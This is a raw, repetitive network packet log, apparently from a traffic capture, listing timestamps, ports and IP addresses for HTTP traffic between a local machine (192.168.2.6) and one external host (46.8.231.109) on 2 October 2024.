                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344480038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344491005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344504118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344530106 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344609976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344624996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344635963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344640017 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344646931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344666004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344708920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344712973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344724894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344734907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344749928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344759941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344789028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344815969 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344827890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344858885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344871044 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344890118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344913006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344923019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344963074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344974041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345006943 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345019102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345041037 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345066071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345098019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345129013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345136881 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345139027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345156908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345171928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345231056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345241070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345251083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345272064 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345297098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345336914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345347881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345380068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345448017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345458031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345468044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345478058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345496893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345521927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345571041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345582008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345592022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345617056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345627069 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345714092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345778942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345788956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345813990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345838070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345935106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345946074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.345976114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348781109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348815918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348824978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348836899 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348856926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348864079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348911047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348926067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348937988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348948002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348959923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.348993063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349037886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349047899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349057913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349067926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349075079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349078894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349101067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349117041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349176884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349191904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349201918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349210978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349225998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.349256992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.352035046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.352046967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.352091074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.352113008 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417319059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417351007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417363882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417375088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417373896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417418957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417418957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417448044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417459965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417490959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417517900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417587042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417619944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417629957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417630911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417644978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417655945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417656898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417670012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417676926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417701006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417702913 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417714119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417726040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417737961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417747021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417748928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417768002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417782068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417813063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417824984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417836905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417849064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417849064 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417861938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417866945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.417892933 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424128056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424140930 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424154043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424186945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424211979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424223900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424235106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424238920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424252987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424253941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424266100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424268961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424292088 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424295902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424315929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424333096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424350977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424362898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424381971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424386978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424405098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424428940 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424444914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424458027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424468994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424485922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424496889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424510002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424535036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424546003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424556017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424572945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424592018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424602985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424606085 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424617052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424629927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424649000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424690962 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424701929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.424738884 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431533098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431550980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431562901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431586981 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431597948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431602001 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431612015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431623936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431632996 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431634903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431648016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431660891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431687117 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431726933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431741953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431752920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431760073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431765079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431777000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431792974 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431862116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431873083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431883097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431894064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431895018 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431921005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431945086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.431955099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432044029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432045937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432055950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432068110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432077885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432079077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432090044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432101011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432113886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432140112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432313919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432326078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432337999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432349920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432353973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432365894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432375908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432377100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432393074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432403088 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432420969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432563066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432574987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432586908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432596922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432607889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432609081 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432622910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432629108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432636023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432643890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432667971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432786942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432799101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432835102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432902098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432914019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432925940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432938099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432950020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432950974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432965040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432971954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432976961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.432990074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433006048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433038950 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433226109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433238983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433249950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433260918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433270931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433274984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433284044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433290958 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433295965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433307886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433307886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433319092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433330059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433331966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433358908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433362961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433387041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433410883 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433566093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433578014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433588982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433612108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433618069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433629036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433636904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.433640003 CEST805851546.8.231.109192.168.2.6
